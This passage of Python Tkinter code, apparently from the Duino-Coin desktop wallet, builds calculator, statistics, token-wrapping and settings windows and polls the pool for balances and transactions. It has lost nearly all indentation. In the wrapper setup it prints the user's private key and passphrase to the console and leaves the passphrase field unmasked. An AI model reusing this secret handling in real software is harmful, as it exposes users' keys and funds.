fromCurrencyInput.grid(row=2,
column=0,
sticky=S + W,
padx=(5, 0))
fromCurrencyInput.insert(0, "DUCO")
vsb = Scrollbar(
calculatorWindow,
orient="vertical",
command=fromCurrencyInput.yview,
background=BACKGROUND_COLOR,
)
vsb.grid(row=2,
column=1,
sticky="ns",
padx=(0, 5))
fromCurrencyInput.configure(yscrollcommand=vsb.set)
fromCurrencyInput.select_set(0)
fromCurrencyInput.event_generate("<<ListboxSelect>>")
Label(
calculatorWindow,
text=get_string("to"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=1,
column=3,
columnspan=2,
sticky=S + W,
padx=5)
toCurrencyInput = Listbox(
calculatorWindow,
exportselection=False,
background=BACKGROUND_COLOR,
selectbackground=FOREGROUND_COLOR,
border="0",
foreground=FONT_COLOR,
font=TEXT_FONT,
width="20",
height="13")
toCurrencyInput.grid(
row=2,
column=3,
sticky=S + W,
padx=(5, 0))
toCurrencyInput.insert(0, "USD")
vsb2 = Scrollbar(
calculatorWindow,
orient="vertical",
command=toCurrencyInput.yview,
background=BACKGROUND_COLOR,)
vsb2.grid(
row=2,
column=4,
sticky="ns",
padx=(0, 5))
toCurrencyInput.configure(yscrollcommand=vsb2.set)
toCurrencyInput.select_set(0)
toCurrencyInput.event_generate("<<ListboxSelect>>")
Label(
calculatorWindow,
text=get_string("input_amount"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=3,
columnspan=2,
column=0,
sticky=S + W,
padx=5)
def clear_ccamount_placeholder(self):
amountInput.delete("0", "100")
amountInput = Entry(
calculatorWindow,
foreground=FOREGROUND_COLOR_SECONDARY,
border="0",
font=TEXT_FONT,
background=BACKGROUND_COLOR,)
amountInput.grid(
row=4,
column=0,
sticky=N + S + W + E,
padx=5,
columnspan=2,
pady=(0, 5))
amountInput.insert("0", str(global_balance))
amountInput.bind("<FocusIn>", clear_ccamount_placeholder)
Button(
calculatorWindow,
text=get_string("calculate"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
background=BACKGROUND_COLOR,
command=currency_converter_calc,
).grid(row=3,
columnspan=2,
column=2,
sticky=N + S + W + E,
pady=(5, 0),
padx=5)
conversionresulttext = StringVar(calculatorWindow)
conversionresulttext.set(get_string("result") + ": 0.0")
conversionresultLabel = Label(
calculatorWindow,
textvariable=conversionresulttext,
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,)
conversionresultLabel.grid(
row=4,
columnspan=2,
column=2,
pady=(0, 5))
calculatorWindow.mainloop()
def statistics_window(handler):
statsApi = get(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duco-statistics/master/"
+ "api.json",
data=None)
    if statsApi.status_code == 200:  # Check for response
statsApi = statsApi.json()
statsWindow = Toplevel()
statsWindow.resizable(False, False)
statsWindow.title(get_string("statistics_title"))
statsWindow.transient([root])
statsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD_LARGE = Font(
statsWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
statsWindow,
size=12,
weight="normal")
Active_workers_listbox = Listbox(
statsWindow,
exportselection=False,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
border="0",
font=TEXT_FONT,
width="65",
height="8",)
Active_workers_listbox.grid(
row=1,
columnspan=2,
sticky=N + E + S + W,
pady=(0, 5),
padx=5)
i = 0
totalHashrate = 0
for threadid in statsApi["Miners"]:
if username in statsApi["Miners"][threadid]["User"]:
rigId = statsApi["Miners"][threadid]["Identifier"]
if rigId == "None":
rigId = ""
else:
rigId += ": "
software = statsApi["Miners"][threadid]["Software"]
hashrate = str(round(statsApi["Miners"][threadid]["Hashrate"], 2))
totalHashrate += float(hashrate)
difficulty = str(statsApi["Miners"][threadid]["Diff"])
shares = (
str(statsApi["Miners"][threadid]["Accepted"])
+ "/"
+ str(
statsApi["Miners"][threadid]["Accepted"]
+ statsApi["Miners"][threadid]["Rejected"]))
Active_workers_listbox.insert(
i,
"#"
+ str(i + 1)
+ ": "
+ rigId
+ software
+ " "
+ str(round(float(hashrate) / 1000, 2))
+ " kH/s @ diff "
+ difficulty
+ ", "
+ shares)
i += 1
if i == 0:
Active_workers_listbox.insert(
i, get_string("statistics_miner_warning"))
totalHashrateString = str(int(totalHashrate)) + " H/s"
if totalHashrate > 1000000000:
totalHashrateString = str(
round(totalHashrate / 1000000000, 2)) + " GH/s"
elif totalHashrate > 1000000:
totalHashrateString = str(round(totalHashrate / 1000000, 2)) + " MH/s"
elif totalHashrate > 1000:
totalHashrateString = str(round(totalHashrate / 1000, 2)) + " kH/s"
Active_workers_listbox.configure(height=i)
Active_workers_listbox.select_set(32)
Active_workers_listbox.event_generate("<<ListboxSelect>>")
Label(
statsWindow,
text=get_string("your_miners") + " - " + totalHashrateString,
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=0,
column=0,
columnspan=2,
sticky=S + W,
pady=5,
padx=5)
Label(
statsWindow,
text=get_string("richlist"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=2,
column=0,
sticky=S + W,
pady=5,
padx=5)
Top_10_listbox = Listbox(
statsWindow,
exportselection=False,
border="0",
font=TEXT_FONT,
width="30",
height="10",
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
Top_10_listbox.grid(
row=3,
column=0,
rowspan=10,
sticky=N + E + S + W,
pady=(0, 5),
padx=5)
for i in statsApi["Top 10 richest miners"]:
Top_10_listbox.insert(i, statsApi["Top 10 richest miners"][i])
Top_10_listbox.select_set(32)
Top_10_listbox.event_generate("<<ListboxSelect>>")
Label(
statsWindow,
text=get_string("network_info"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=2,
column=1,
sticky=S + W,
padx=5,
pady=5)
Label(
statsWindow,
text=get_string("difficulty")
+ ": "
+ str(statsApi["Current difficulty"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=3,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("mined_blocks")
+ ": "
+ str(statsApi["Mined blocks"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=4,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("network_hashrate")
+ ": "
+ str(statsApi["Pool hashrate"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=5,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("active_miners")
+ ": "
+ str(len(statsApi["Miners"])),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=6,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text="1 DUCO "
+ get_string("estimated_price")
+ ": $"
+ str(statsApi["Duco price"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=7,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("registered_users")
+ ": "
+ str(statsApi["Registered users"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=8,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("mined_duco")
+ ": "
+ str(statsApi["All-time mined DUCO"])
+ " ᕲ",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=9,
column=1,
sticky=S + W,
padx=5)
statsWindow.mainloop()
def wrapper_window(handler):
def Wrap():
amount = amountWrap.get()
print("Got amount: ", amount)
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
try:
float(amount)
except Exception:
pass
else:
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
_ = soc.recv(10)
soc.send(
bytes(
"WRAP,"
+ str(amount)
+ ","
+ str(pub_key),
encoding="utf8"))
soc.close()
sleep(2)
wrapperWindow.quit()
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
except Exception:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error"))
else:
if TRONPY_ENABLED:
pub_key = pubkeyfile.read()
pubkeyfile.close()
wrapperWindow = Toplevel()
wrapperWindow.resizable(False, False)
wrapperWindow.title(get_string("wrapper_title"))
wrapperWindow.transient([root])
askWrapAmount = Label(
wrapperWindow,
text=get_string("wrapper_amount_to_wrap") + ":")
askWrapAmount.grid(row=0,
column=0,
sticky=N + W)
amountWrap = Entry(wrapperWindow,
border="0",
font=Font(size=15))
amountWrap.grid(row=1,
column=0,
sticky=N + W)
wrapButton = Button(wrapperWindow,
text="Wrap",
command=Wrap)
wrapButton.grid(row=2,
column=0,
sticky=N + W)
else:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error_tronpy"))
def unwrapper_window(handler):
def UnWrap():
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pub_key = pubkeyfile.read()
pubkeyfile.close()
passphrase = passphraseEntry.get()
privkeyfile = open(str(resources + "DUCOPrivKey.encrypt"), "r")
privKeyEnc = privkeyfile.read()
privkeyfile.close()
try:
priv_key = str(password_decrypt(privKeyEnc, passphrase))[2:66]
use_wrapper = True
except InvalidToken:
print(get_string("invalid_passphrase"))
use_wrapper = False
amount = amountUnWrap.get()
print("Got amount:", amount)
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
try:
float(amount)
except Exception:
pass
else:
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
_ = soc.recv(10)
if use_wrapper:
pendingvalues = wduco.functions.pendingWithdrawals(
pub_key, username)
# transaction wasn't initiated, but variable should be declared
txn_success = False
try:
amount = float(amount)
except ValueError:
print("Value should be numeric - aborting")
else:
if int(float(amount) * 10 ** 6) >= pendingvalues:
toInit = int(float(amount) * 10 ** 6) - pendingvalues
else:
toInit = amount * 10 ** 6
if toInit > 0:
txn = (
wduco.functions.initiateWithdraw(username, toInit)
.with_owner(pub_key)
.fee_limit(5_000_000)
.build()
.sign(PrivateKey(bytes.fromhex(priv_key))))
txn = txn.broadcast()
txnfeedback = txn.result()
if txnfeedback:
txn_success = True
else:
txn_success = False
if txn_success or amount <= pendingvalues:
soc.send(
bytes(
"UNWRAP,"
+ str(amount)
+ ","
+ str(pub_key),
encoding="utf8"))
soc.close()
sleep(2)
unWrapperWindow.quit()
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pubkeyfile.read()
pubkeyfile.close()
except Exception:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error"))
else:
if TRONPY_ENABLED:
unWrapperWindow = Toplevel()
unWrapperWindow.resizable(False, False)
unWrapperWindow.title(get_string("unwrapper_title"))
unWrapperWindow.transient([root])
unWrapperWindow.configure()
askAmount = Label(
unWrapperWindow,
text=get_string("unwrap_amount"))
askAmount.grid(row=1,
column=0,
sticky=N + W)
amountUnWrap = Entry(
unWrapperWindow,
border="0",
font=Font(size=15))
amountUnWrap.grid(row=2,
column=0,
sticky=N + W)
askPassphrase = Label(
unWrapperWindow,
text=get_string("ask_passphrase"))
askPassphrase.grid(row=4,
column=0,
sticky=N + W)
passphraseEntry = Entry(
unWrapperWindow,
border="0",
font=Font(size=15))
passphraseEntry.grid(
row=5,
column=0,
sticky=N + W)
wrapButton = Button(
unWrapperWindow,
text=get_string("unwrap_duco"),
command=UnWrap)
wrapButton.grid(
row=7,
column=0,
sticky=N + W)
else:
messagebox.showerror(
title=get_string("wrapper_error"),
message=get_string("wrapper_error_tronpy"))
def settings_window(handler):
def _wrapperconf():
if TRONPY_ENABLED:
privkey_input = StringVar()
passphrase_input = StringVar()
wrapconfWindow = Toplevel()
wrapconfWindow.resizable(False, False)
wrapconfWindow.title(get_string("wrapper_title"))
wrapconfWindow.transient([root])
wrapconfWindow.configure()
def setwrapper():
if privkey_input and passphrase_input:
priv_key = privkey_entry.get()
print("Got priv key:", priv_key)
passphrase = passphrase_entry.get()
print("Got passphrase:", passphrase)
try:
pub_key = PrivateKey(
bytes.fromhex(priv_key)
).public_key.to_base58check_address()
except Exception:
pass
else:
print("Saving data")
privkeyfile = open(
str(resources + "DUCOPrivKey.encrypt"), "w")
privkeyfile.write(
str(password_encrypt(
priv_key.encode(), passphrase
).decode()))
privkeyfile.close()
pubkeyfile = open(
str(resources + "DUCOPubKey.pub"), "w")
pubkeyfile.write(pub_key)
pubkeyfile.close()
Label(wrapconfWindow, text=get_string(
"wrapper_success")).pack()
wrapconfWindow.quit()
title = Label(
wrapconfWindow,
text=get_string("wrapper_config_title"),
font=Font(size=20))
title.grid(row=0,
column=0,
sticky=N + W,
padx=5)
askprivkey = Label(
wrapconfWindow,
text=get_string("ask_private_key"))
askprivkey.grid(row=1,
column=0,
sticky=N + W)
privkey_entry = Entry(
wrapconfWindow,
font=TEXT_FONT,
textvariable=privkey_input)
privkey_entry.grid(row=2,
column=0,
sticky=N + W)
askpassphrase = Label(wrapconfWindow,
text=get_string("passphrase"))
askpassphrase.grid(row=3,
column=0,
sticky=N + W)
passphrase_entry = Entry(
wrapconfWindow,
font=TEXT_FONT,
textvariable=passphrase_input)
passphrase_entry.grid(row=4,
column=0,
sticky=N + W)
wrapConfigButton = Button(
wrapconfWindow,
text=get_string("configure_wrapper_lowercase"),
command=setwrapper)
wrapConfigButton.grid(row=5,
column=0,
sticky=N + W)
wrapconfWindow.mainloop()
else:
messagebox.showerror(
title=get_string("wrapper_error"),
message=get_string("wrapper_error_tronpy"))
def _logout():
try:
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("DELETE FROM UserData")
con.commit()
except Exception as e:
print(e)
try:
execl(sys.executable, sys.executable, *sys.argv)
except Exception as e:
print(e)
def _cleartrs():
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("DELETE FROM transactions")
con.commit()
def _chgpass():
def _changepassprotocol():
oldpasswordS = oldpassword.get()
newpasswordS = newpassword.get()
confpasswordS = confpassword.get()
if oldpasswordS != newpasswordS:
if oldpasswordS and newpasswordS and confpasswordS:
if newpasswordS == confpasswordS:
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(
bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
soc.recv(2)
soc.send(
bytes(
"CHGP,"
+ str(oldpasswordS)
+ ","
+ str(newpasswordS),
encoding="utf8"))
response = soc.recv(128).decode(
"utf8").rstrip("\n").split(",")
soc.close()
if not "OK" in response[0]:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=response[1])
else:
messagebox.showinfo(
title=get_string("change_passwd_ok"),
message=response[1])
try:
try:
with sqlconn(
resources + "wallet.db"
) as con:
cur = con.cursor()
cur.execute("DELETE FROM UserData")
con.commit()
except Exception as e:
print(e)
except FileNotFoundError:
pass
execl(sys.executable, sys.executable, *sys.argv)
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("error_passwd_dont_match"))
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("fill_the_blanks_warning"))
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("same_passwd_error"))
settingsWindow.destroy()
changepassWindow = Toplevel()
changepassWindow.title(get_string("change_passwd_lowercase"))
changepassWindow.resizable(False, False)
changepassWindow.transient([root])
changepassWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD = Font(changepassWindow, size=12, weight="bold")
TEXT_FONT = Font(changepassWindow, size=12, weight="normal")
Label(
changepassWindow,
text=get_string("old_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=0,
sticky=W,
padx=5)
oldpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
oldpassword.grid(row=1,
sticky="nswe",
padx=5)
Label(
changepassWindow,
text=get_string("new_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=2,
sticky=W,
padx=5)
newpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
newpassword.grid(row=3,
sticky="nswe",
padx=5)
Label(
changepassWindow,
text=get_string("confirm_new_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=4,
sticky=W,
padx=5)
confpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
confpassword.grid(row=5,
sticky="nswe",
padx=5)
chgpbtn = Button(
changepassWindow,
text=get_string("change_passwd"),
command=_changepassprotocol,
foreground=FOREGROUND_COLOR,
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
chgpbtn.grid(columnspan=2,
sticky="nswe",
pady=5,
padx=5)
settingsWindow = Toplevel()
settingsWindow.resizable(False, False)
settingsWindow.title(get_string("settings_title"))
settingsWindow.transient([root])
settingsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT = Font(
settingsWindow,
size=12,
weight="normal")
TEXT_FONT_BOLD_LARGE = Font(
settingsWindow,
size=12,
weight="bold")
Label(
settingsWindow,
text=get_string("uppercase_settings"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=0,
column=0,
columnspan=4,
sticky=S + W,
pady=(5, 5),
padx=(5, 0))
logoutbtn = Button(
settingsWindow,
text=get_string("logout"),
command=_logout,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
logoutbtn.grid(row=1,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
chgpassbtn = Button(
settingsWindow,
text=get_string("change_passwd"),
command=_chgpass,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
chgpassbtn.grid(row=2,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
wrapperconfbtn = Button(
settingsWindow,
text=get_string("configure_wrapper"),
command=_wrapperconf,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
wrapperconfbtn.grid(row=3,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
cleartransbtn = Button(
settingsWindow,
text=get_string("clear_transactions"),
command=_cleartrs,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
cleartransbtn.grid(row=4,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
separator = ttk.Separator(settingsWindow, orient="horizontal")
separator.grid(
row=5,
column=0,
columnspan=4,
sticky=N + S + E + W,
padx=(5, 5),
pady=5)
Label(
settingsWindow,
text=get_string("logged_in_as")
+ ": "
+ str(username),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=6,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("wallet_version")
+ ": "
+ str(VERSION),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=7,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("translation_author_message")
+ " "
+ get_string("translation_author"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=8,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("config_dev_warning"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=9,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
separator = ttk.Separator(settingsWindow, orient="horizontal")
separator.grid(
row=10,
column=0,
columnspan=4,
sticky=N + S + E + W,
padx=(5, 5),
pady=5)
original = Image.open(resources + "duco.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
website = ImageTk.PhotoImage(resized)
website.image = website
websiteLabel = Label(
settingsWindow,
image=website,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
websiteLabel.grid(
row=11,
column=0,
sticky=N + S + E + W,
padx=(5, 0),
pady=(0, 5))
websiteLabel.bind("<Button-1>", openWebsite)
original = Image.open(resources + "github.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
github = ImageTk.PhotoImage(resized)
github.image = github
githubLabel = Label(
settingsWindow,
image=github,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
githubLabel.grid(
row=11,
column=1,
sticky=N + S + E + W,
pady=(0, 5))
githubLabel.bind("<Button-1>", openGitHub)
original = Image.open(resources + "exchange.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
exchange = ImageTk.PhotoImage(resized)
exchange.image = exchange
exchangeLabel = Label(
settingsWindow,
image=exchange,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
exchangeLabel.grid(
row=11,
column=2,
sticky=N + S + E + W,
pady=(0, 5))
exchangeLabel.bind("<Button-1>", openExchange)
original = Image.open(resources + "discord.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
discord = ImageTk.PhotoImage(resized)
discord.image = discord
discordLabel = Label(
settingsWindow,
image=discord,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
discordLabel.grid(
row=11,
column=3,
sticky=N + S + E + W,
padx=(0, 5),
pady=(0, 5))
discordLabel.bind("<Button-1>", openDiscord)
def get_balance():
global oldbalance
global balance
global unpaid_balance
global global_balance
global gtxl
try:
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
_ = soc.recv(2)
soc.send(bytes(
"BALA",
encoding="utf8"))
oldbalance = balance
balance = float(soc.recv(64).decode().rstrip("\n"))
global_balance = round(float(balance), 8)
try:
gtxl = {}
soc.send(bytes(
"GTXL," + str(username) + ",7",
encoding="utf8"))
gtxl = str(soc.recv(8096).decode().rstrip(
"\n").replace("\'", "\""))
gtxl = jsonloads(gtxl)
except Exception as e:
print("Error getting transaction list: " + str(e))
if oldbalance != balance:
difference = float(balance) - float(oldbalance)
dif_with_unpaid = (
float(balance) - float(oldbalance)) + unpaid_balance
if float(balance) != float(difference):
if (dif_with_unpaid >= MIN_TRANSACTION_VALUE
or dif_with_unpaid < 0
):
now = datetime.now()
difference = round(dif_with_unpaid, 8)
if (
difference >= MIN_TRANSACTION_VALUE_NOTIFY
or difference < 0
and notificationsEnabled
):
notification = Notify()
notification.title = get_string("duino_coin_wallet")
notification.message = (
get_string("notification_new_transaction")
+ "\n"
+ now.strftime("%d.%m.%Y %H:%M:%S\n")
+ str(round(difference, 6))
+ " DUCO")
notification.icon = resources + "duco_color.png"
notification.send(block=False)
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute(
"""INSERT INTO Transactions(Date, amount)
VALUES(?, ?)""", (
now.strftime("%d.%m.%Y %H:%M:%S"),
round(difference, 8)))
con.commit()
unpaid_balance = 0
else:
unpaid_balance += float(balance) - float(oldbalance)
except Exception as e:
print("Retrying in 3s. (" + str(e) + ")")
Timer(3, get_balance).start()
def get_wbalance():
if TRONPY_ENABLED:
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pub_key = pubkeyfile.read()
pubkeyfile.close()
wBalance = float(wduco.functions.balanceOf(pub_key)) / (10 ** 6)
return wBalance
except Exception:
return 0.0
else:
return 0.0
def update_balance_labels():
global profit_array, profitCheck
try:
balancetext.set(str(round(global_balance, 7)) + " ᕲ")
wbalancetext.set(str(get_wbalance()) + " wᕲ")
balanceusdtext.set(
"$" + str(round(global_balance * duco_fiat_value, 4)))
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("SELECT rowid,* FROM Transactions ORDER BY rowid DESC")
Transactions = cur.fetchall()
transactionstext_format = ""
for i, row in enumerate(Transactions, start=1):
transactionstext_format += f"{str(row[1])} {row[2]} DUCO\n"
if i == 6:
transactionstext_format = transactionstext_format.rstrip("\n")
break
transactionstext.set(transactionstext_format)
if profit_array[2] != 0:
sessionprofittext.set(
get_string("session") + ": "
+ str(profit_array[0]) + " ᕲ")
minuteprofittext.set(
"≈" + str(profit_array[1]) + " ᕲ/"
+ get_string("minute"))
hourlyprofittext.set(
"≈" + str(profit_array[2]) + " ᕲ/"
+ get_string("hour"))
dailyprofittext.set(
"≈"
+ str(profit_array[3])
+ " ᕲ/"
+ get_string("day")
+ " ($"
+ str(round(profit_array[3] * duco_fiat_value, 4))
+ ")")
else:
if profitCheck > 10:
sessionprofittext.set(get_string("sessionprofit_unavailable1"))
minuteprofittext.set(get_string("sessionprofit_unavailable2"))
hourlyprofittext.set("")
dailyprofittext.set("")
profitCheck += 1
except Exception:
_exit(0)
Timer(1, update_balance_labels).start()
def profit_calculator(start_bal):
try: # Thanks Bilaboz for the code!
global curr_bal, profit_array
prev_bal = curr_bal
curr_bal = global_balance
session = curr_bal - start_bal
tensec = curr_bal - prev_bal
minute = tensec * 6
hourly = minute * 60
daily = hourly * 24
if tensec >= 0:
profit_array = [
round(session, 8),
round(minute, 6),
round(hourly, 4),
round(daily, 2)]
except Exception:
_exit(0)
Timer(10, profit_calculator, [start_bal]).start()
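    # Example of the extrapolation above: a gain of 0.05 DUCO between two 10-second polls gives
    # 0.05 * 6 = 0.3 DUCO/min, 0.3 * 60 = 18 DUCO/h and 18 * 24 = 432 DUCO/day.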
def send_funds_protocol(handler):
recipientStr = recipient.get()
amountStr = amount.get()
MsgBox = messagebox.askquestion(
get_string("warning"),
get_string("send_funds_warning")
+ str(amountStr)
+ " DUCO "
+ get_string("send_funds_to")
+ " "
+ str(recipientStr),
icon="warning",)
if MsgBox == "yes":
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
response = soc.recv(2)
soc.send(
bytes(
"SEND,"
+ "-"
+ ","
+ str(recipientStr)
+ ","
+ str(amountStr),
encoding="utf8"))
response = soc.recv(128).decode().rstrip("\n").split(",")
soc.close()
if "OK" in str(response[0]):
MsgBox = messagebox.showinfo(response[0],
response[1]
+ "\nTXID:"
+ response[2])
else:
MsgBox = messagebox.showwarning(response[0], response[1])
root.update()
def init_rich_presence():
global RPC
try:
RPC = Presence(806985845320056884)
RPC.connect()
except Exception: # Discord not launched
pass
def update_rich_presence():
startTime = int(time())
while True:
try:
balance = round(global_balance, 4)
RPC.update(
details=str(balance)
+ " ᕲ ($"
+ str(round(duco_fiat_value * balance, 2))
+ ")",
start=startTime,
large_image="duco",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
except Exception: # Discord not launched
pass
sleep(15)
class Wallet:
def __init__(self, master):
global recipient
global amount
global balancetext
global wbalancetext
global sessionprofittext
global minuteprofittext
global hourlyprofittext
global dailyprofittext
global balanceusdtext
global transactionstext
global curr_bal
global profit_array
try:
loading.destroy()
except Exception:
pass
textFont4 = Font(
size=14,
weight="bold")
TEXT_FONT_BOLD_LARGE = Font(
size=12,
weight="bold")
TEXT_FONT_BOLD = Font(
size=18,
weight="bold")
TEXT_FONT = Font(
size=12,
weight="normal")
self.master = master
master.resizable(False, False)
master.configure(background=BACKGROUND_COLOR)
master.title(get_string("duino_coin_wallet"))
Label(
master,
text=get_string("uppercase_duino_coin_wallet")
+ ": "
+ str(username),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=0,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
balancetext = StringVar()
wbalancetext = StringVar()
balancetext.set(get_string("please_wait"))
if TRONPY_ENABLED:
wbalancetext.set(get_string("please_wait"))
else:
wbalancetext.set("0.00")
balanceLabel = Label(
master,
textvariable=balancetext,
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
balanceLabel.grid(row=1,
column=0,
columnspan=3,
sticky=S + W,
padx=(5, 0))
wbalanceLabel = Label(
master,
textvariable=wbalancetext,
font=textFont4,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
wbalanceLabel.grid(row=2,
column=0,
columnspan=3,
sticky=S + W,
padx=(5, 0))
balanceusdtext = StringVar()
balanceusdtext.set(get_string("please_wait"))
Label(
master,
textvariable=balanceusdtext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=1,
column=3,
sticky=S + E,
pady=(0, 1.5),
padx=(0, 5))
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=4,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5, 5),
pady=(0, 5))
def clear_recipient_placeholder(self):
recipient.delete("0", "100")
def clear_amount_placeholder(self):
amount.delete("0", "100")
Label(
master,
text=get_string("recipient"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=5,
column=0,
